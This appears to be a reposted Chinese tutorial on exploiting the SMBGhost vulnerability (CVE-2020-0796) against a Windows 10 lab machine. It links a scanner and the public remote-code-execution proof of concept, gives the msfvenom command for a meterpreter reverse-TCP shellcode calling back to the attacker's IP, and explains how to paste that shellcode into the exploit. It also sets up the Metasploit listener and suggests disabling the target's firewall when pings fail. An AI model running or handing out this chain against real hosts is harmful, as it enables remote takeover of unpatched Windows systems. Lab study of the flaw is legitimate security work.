CVE-2020-0796永恒之黑利用

攻击机ip:192.168.20.133

目标ip:192.168.20.138
靶机thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa
poc
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

下图中说明192.168.20.138存在漏洞

image-20220401141836373

exp需要python版本3.6
https://github.com/chompie1337/SMBGhost_RCE_PoC

生成shellcode:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.133 lport=4444 -f py

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HzlOykNI-1648796003051)(https://raw.githubusercontent.com/VVeakee/img_bed/main/202204011421315.png)]

把生成的shellcode粘贴出来

把buf全部替换为USER_PAYLOAD

image-20220401140305788

把替换好的shellcode再去exp利用脚本里替换

image-20220401141102454

msf设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.133
set lport 4444
run

开始实施攻击(确定你的python版本是3.6)

如果出现下图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4QZRmPRI-1648796003054)(https://raw.githubusercontent.com/VVeakee/img_bed/main/202204011438816.png)]

就先ping一下是不是能ping通

image-20220401144008623

果然ping不通

然后去把windows的防火墙关了就能ping通了

image-20220401144112093

再试一下出现了这个,再试一下

image-20220401144203248

然后就成功了这个,再试一下

[外链图片转存中...(img-lBh2nD6m-1648796003056)]

然后就成功了
image-20220401144339147


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部